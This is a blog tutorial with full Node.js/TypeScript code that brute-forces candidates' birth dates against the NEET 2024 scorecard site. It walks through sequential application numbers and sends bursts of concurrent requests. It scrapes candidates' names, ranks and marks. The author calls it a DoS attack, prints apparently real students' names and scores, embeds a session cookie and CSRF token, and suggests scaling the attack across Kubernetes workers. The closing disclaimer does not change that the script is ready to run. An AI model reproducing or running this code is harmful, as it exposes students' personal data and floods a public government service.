Scraping NEET 2024 Results (a DoS attack on the NEET website)
What is web scraping?
Web scraping is the process of automatically extracting information from websites. It involves fetching the web page and parsing the content to retrieve the desired data.
What are we going to do?
We are going to fetch students' results using their application numbers. Once we have all the data, we can build a merit list or anything else we want. (The data of every candidate is literally open to all 🙃)
Is this legal?
Well, it can violate IT laws and regulations. We would be violating students' privacy, and by hammering the server with countless requests we would effectively be mounting a DoS attack on a government website, denying legitimate users access.
Prerequisites and Libraries used:
Basic Node.js knowledge and an understanding of how the request-response cycle works on the web. You should also be familiar with the asynchronous nature of JavaScript: how to use await and how to handle promises.
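If you are rusty on promises, here is a minimal refresher on the await + Promise.all pattern this tutorial leans on. `fakeLookup` is a hypothetical stand-in for an HTTP call, not a real API:

```javascript
// fakeLookup simulates an async HTTP call that resolves after 10 ms.
function fakeLookup(id) {
  return new Promise((resolve) => setTimeout(() => resolve(`result-${id}`), 10));
}

async function demo() {
  const one = await fakeLookup(1); // await a single promise
  const batch = await Promise.all(
    [2, 3, 4].map((id) => fakeLookup(id)) // fire three lookups concurrently
  );
  return { one, batch };
}

demo().then((out) => console.log(out));
// → { one: 'result-1', batch: [ 'result-2', 'result-3', 'result-4' ] }
```

Awaiting `Promise.all` is what lets us send a whole batch of requests at once instead of waiting for each one serially.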
Libraries used:
- axios: For making HTTP requests.
- cheerio: For parsing HTML and traversing the DOM.
- qs: For parsing and stringifying query strings.
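qs serializes a plain object into an application/x-www-form-urlencoded request body. For a flat payload like the one used here, Node's built-in URLSearchParams produces essentially the same encoding, so you can preview the body shape without installing anything (URLSearchParams stands in for qs in this sketch):

```javascript
// Preview of the form-encoded body the scorecard endpoint expects.
// Both qs and URLSearchParams percent-encode the bracketed field names.
const body = new URLSearchParams({
  "Scorecardmodel[ApplicationNumber]": "240411345673",
  "Scorecardmodel[Day]": "5",
  "Scorecardmodel[Month]": "5",
  "Scorecardmodel[Year]": "2006",
}).toString();

console.log(body);
// Scorecardmodel%5BApplicationNumber%5D=240411345673&Scorecardmodel%5BDay%5D=5&...
```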
So let’s code!
1. Installing libraries
npm install axios cheerio qs
2. Setting Up the Environment & Importing Libraries
Make sure you have Node.js installed. If not, you can download it from nodejs.org.
import axios from "axios";
import cheerio from "cheerio";
import qs from 'qs';
3. Fetch result request (The request sent to the NTA server)
async function fetchResult(applicationNumber, day, month, year) {
  let data = qs.stringify({
    '_csrf-frontend': '0eWuzNoRUjL6S_wbEOGQTLrAbEZsdMxim70FfaI7Yb-4rtS0kSEAWJ4KqyxFvtQIg7kqNxklrSnIhXRP0lU12Q==',
    'Scorecardmodel[ApplicationNumber]': applicationNumber,
    'Scorecardmodel[Day]': day,
    'Scorecardmodel[Month]': month,
    'Scorecardmodel[Year]': year
  });
  let config = {
    method: 'post',
    maxBodyLength: Infinity,
    url: 'https://neet.ntaonline.in/frontend/web/scorecard/index',
    headers: {
      'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
      'Accept-Language': 'en-US,en;q=0.9,hi;q=0.8',
      'Cache-Control': 'max-age=0',
      'Connection': 'keep-alive',
      'Content-Type': 'application/x-www-form-urlencoded',
      'Cookie': 'advanced-frontend=88a6rqa00bo5sckgmf2shk2kc7; _csrf-frontend=eb6d1314f029304ad4b0bdbfdf64f8b6411f03579bc919893b53db3709d4e5d5a%3A2%3A%7Bi%3A0%3Bs%3A14%3A%22_csrf-frontend%22%3Bi%3A1%3Bs%3A32%3A%22iKzxK0RjdAW7U_DD9yFquQaKS8q2pnTf%22%3B%7D',
      'DNT': '1',
      'Origin': 'null',
      'Sec-Fetch-Dest': 'document',
      'Sec-Fetch-Mode': 'navigate',
      'Sec-Fetch-Site': 'same-origin',
      'Sec-Fetch-User': '?1',
      'Upgrade-Insecure-Requests': '1',
      'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36',
      'sec-ch-ua': '"Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24"',
      'sec-ch-ua-mobile': '?0',
      'sec-ch-ua-platform': '"Windows"'
    },
    data: data
  };
  try {
    const response = await axios.request(config);
    const parsedHtmlContent = parseHTML(JSON.stringify(response.data));
    if (parsedHtmlContent) {
      return parsedHtmlContent;
    }
    return null; // no parsable scorecard in the response
  } catch (error) {
    return null; // request failed (e.g. invalid date combination)
  }
}
How did we get this? (It’s pretty simple, just follow the steps.)
- First, you need valid candidate credentials to log in and view a scorecard. (We need this to discover the URL of the request that actually fetches the data.)
- Then open the Network tab in Chrome’s Developer Tools, right-click the “index” request, and copy it as cURL.
- Now open Postman and click “Import”. You can paste the copied cURL there and convert it into Node.js code.
4. Parse the HTML Content
The parseHTML function uses Cheerio to load the HTML content and extract the desired data fields. We need this parsing step because the response comes back as HTML; it converts the markup into a JSON-friendly object.
function parseHTML(htmlContent) {
  const $ = cheerio.load(htmlContent);
  const applicationNumber = $('td:contains("Application No.")').next('td').text().trim() || 'N/A';
  const candidateName = $('td:contains("Candidate’s Name")').next().text().trim() || 'N/A';
  const allIndiaRank = $('td:contains("NEET All India Rank")').next('td').text().trim() || 'N/A';
  const marks = $('td:contains("Total Marks Obtained (out of 720)")').first().next('td').text().trim() || 'N/A';
  if (allIndiaRank === 'N/A') {
    return null;
  }
  return {
    applicationNumber,
    candidateName,
    allIndiaRank,
    marks
  };
}
5. Brute-Forcing the Date of Birth
The findResults function iterates through a range of birth dates to find the correct one for a given application number.
async function findResults(applicationNumber) {
  let solved = false;
  for (let year = 2007; year > 2003; year--) {
    if (solved) {
      break;
    }
    for (let month = 1; month <= 12; month++) {
      if (solved) {
        break;
      }
      const dataPromises = [];
      console.log("Sending request for: " + applicationNumber + " year: " + year + " month: " + month);
      for (let day = 1; day <= 31; day++) {
        const data = fetchResult(applicationNumber, day.toString(), month.toString(), year.toString());
        dataPromises.push(data);
      }
      const resolvedData = await Promise.all(dataPromises);
      resolvedData.forEach(data => {
        if (data) {
          console.log(data);
          solved = true;
        }
      });
    }
  }
}
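Stripped of the HTTP details, the day loop above is a fan-out/fan-in pattern: fire all 31 lookups at once, await the whole batch, then keep the hit. Here is a self-contained skeleton of that pattern, with `stubFetch` as a hypothetical stand-in for fetchResult that only "succeeds" for day 17:

```javascript
// stubFetch mimics fetchResult: null for a wrong date, an object for the right one.
async function stubFetch(day) {
  return day === 17 ? { day, rank: "1234" } : null;
}

async function findInBatch() {
  const promises = [];
  for (let day = 1; day <= 31; day++) {
    promises.push(stubFetch(day)); // fire all lookups concurrently
  }
  const results = await Promise.all(promises); // wait for the whole batch
  return results.find((r) => r !== null) ?? null; // keep the first non-null hit
}

findInBatch().then((hit) => console.log(hit)); // → { day: 17, rank: '1234' }
```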
6. Iterate over Different Application Numbers
The main function iterates through a range of application numbers and looks up the result for each.
async function main() {
  for (let appNumber = 240411345673; appNumber < 240411999999; appNumber++) {
    await findResults(appNumber.toString());
  }
}

main();
Here’s what our index.ts file would look like:
import axios from "axios";
import cheerio from "cheerio";
import qs from 'qs';
import "./list.json";

async function fetchResult(applicationNumber: string, day: string, month: string, year: string) {
  let data = qs.stringify({
    '_csrf-frontend': '0eWuzNoRUjL6S_wbEOGQTLrAbEZsdMxim70FfaI7Yb-4rtS0kSEAWJ4KqyxFvtQIg7kqNxklrSnIhXRP0lU12Q==',
    'Scorecardmodel[ApplicationNumber]': applicationNumber,
    'Scorecardmodel[Day]': day,
    'Scorecardmodel[Month]': month,
    'Scorecardmodel[Year]': year
  });
  let config = {
    method: 'post',
    maxBodyLength: Infinity,
    url: 'https://neet.ntaonline.in/frontend/web/scorecard/index',
    headers: {
      'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
      'Accept-Language': 'en-US,en;q=0.9,hi;q=0.8',
      'Cache-Control': 'max-age=0',
      'Connection': 'keep-alive',
      'Content-Type': 'application/x-www-form-urlencoded',
      'Cookie': 'advanced-frontend=88a6rqa00bo5sckgmf2shk2kc7; _csrf-frontend=eb6d1314f029304ad4b0bdbfdf64f8b6411f03579bc919893b53db3709d4e5d5a%3A2%3A%7Bi%3A0%3Bs%3A14%3A%22_csrf-frontend%22%3Bi%3A1%3Bs%3A32%3A%22iKzxK0RjdAW7U_DD9yFquQaKS8q2pnTf%22%3B%7D',
      'DNT': '1',
      'Origin': 'null',
      'Sec-Fetch-Dest': 'document',
      'Sec-Fetch-Mode': 'navigate',
      'Sec-Fetch-Site': 'same-origin',
      'Sec-Fetch-User': '?1',
      'Upgrade-Insecure-Requests': '1',
      'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36',
      'sec-ch-ua': '"Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24"',
      'sec-ch-ua-mobile': '?0',
      'sec-ch-ua-platform': '"Windows"'
    },
    data: data
  };
  try {
    const response = await axios.request(config);
    const parsedHtmlContent = parseHTML(JSON.stringify(response.data));
    if (parsedHtmlContent) {
      return parsedHtmlContent;
    }
    return null; // no parsable scorecard in the response
  } catch (error) {
    return null; // request failed (e.g. invalid date combination)
  }
}

function parseHTML(htmlContent: string) {
  const $ = cheerio.load(htmlContent);
  const applicationNumber = $('td:contains("Application No.")').next('td').text().trim() || 'N/A';
  // Find the candidate's name
  const candidateName = $('td:contains("Candidate’s Name")').next().text().trim() || 'N/A';
  // Find the All India Rank
  const allIndiaRank = $('td:contains("NEET All India Rank")').next('td').text().trim() || 'N/A';
  const marks = $('td:contains("Total Marks Obtained (out of 720)")').first().next('td').text().trim() || 'N/A';
  if (allIndiaRank === 'N/A') {
    return null;
  }
  return {
    applicationNumber,
    candidateName,
    allIndiaRank,
    marks
  };
}

async function findResults(applicationNumber: string) {
  let solved = false;
  for (let year = 2007; year > 2003; year--) {
    if (solved) {
      break;
    }
    for (let month = 1; month <= 12; month++) {
      if (solved) {
        break;
      }
      const dataPromises = [];
      console.log("Sending request for: " + applicationNumber + " year: " + year + " month: " + month);
      for (let day = 1; day <= 31; day++) {
        const data = fetchResult(applicationNumber, day.toString(), month.toString(), year.toString());
        dataPromises.push(data);
      }
      const resolvedData = await Promise.all(dataPromises);
      resolvedData.forEach(data => {
        if (data) {
          console.log(data);
          solved = true;
        }
      });
    }
  }
}

async function main() {
  for (let appNumber = 240411346676; appNumber < 240411999999; appNumber++) {
    await findResults(appNumber.toString());
  }
}

main();
package.json scripts:
Add “start” and “dev” scripts. The dev script first builds the project (compiles the TS files to JS) and then runs it.
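For reference, a minimal package.json for this setup might look like the sketch below. The package name and the start script match the npm output shown later; the tsc build step and the version ranges are assumptions, so adjust them to your own setup. "type": "module" is needed because the code uses import syntax.

```json
{
  "name": "neet-scrapper",
  "version": "1.0.0",
  "type": "module",
  "scripts": {
    "start": "node index.js",
    "dev": "tsc && npm run start"
  },
  "dependencies": {
    "axios": "^1.7.0",
    "cheerio": "^1.0.0-rc.12",
    "qs": "^6.12.0"
  },
  "devDependencies": {
    "typescript": "^5.4.0"
  }
}
```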
Output: (Everyone’s excited, I know!… cool down, guys! 😏)
Sending request for: 240411179822 year: 2007 month: 4
{
  applicationNumber: '240411179822',
  candidateName: 'POREDDY PAVAN KUMAR REDDY',
  allIndiaRank: '1',
  marks: '720'
}
> neet-scrapper@1.0.0 start
> node index.js
Sending request for: 240411345673 year: 2007 month: 1
Sending request for: 240411345673 year: 2007 month: 2
{
  applicationNumber: '240411345673',
  candidateName: 'DIVYA S',
  allIndiaRank: '2203573',
  marks: '36'
}
Sending request for: 240411345674 year: 2007 month: 1
Sending request for: 240411345674 year: 2007 month: 2
Sending request for: 240411345674 year: 2007 month: 3
> neet-scrapper@1.0.0 start
> node index.js
Sending request for: 240411346676 year: 2007 month: 1
Sending request for: 240411346676 year: 2007 month: 2
Sending request for: 240411346676 year: 2007 month: 3
Sending request for: 240411346676 year: 2007 month: 4
Sending request for: 240411346676 year: 2007 month: 5
Sending request for: 240411346676 year: 2007 month: 6
Sending request for: 240411346676 year: 2007 month: 7
Sending request for: 240411346676 year: 2007 month: 8
Sending request for: 240411346676 year: 2007 month: 9
Sending request for: 240411346676 year: 2007 month: 10
{
  applicationNumber: '240411346676',
  candidateName: 'SAURAV KUMAR',
  allIndiaRank: '2319827',
  marks: '2'
}
Sending request for: 240411346677 year: 2007 month: 1
Conclusions:
This is one of the simplest ways to scrape a website. We could run this on multiple servers (known as workers) using Docker and Kubernetes to scrape even more data.
In this tutorial, we covered the basics of web scraping, including setting up the environment and writing a scraping script using axios and cheerio. We also discussed how to handle form submissions and parse HTML content to extract the desired data.
PLEASE DON’T PRACTICE THIS… It can violate data protection laws and could actually get you in trouble.
THANK YOU FOR READING ❤
I hope you found it informative and engaging.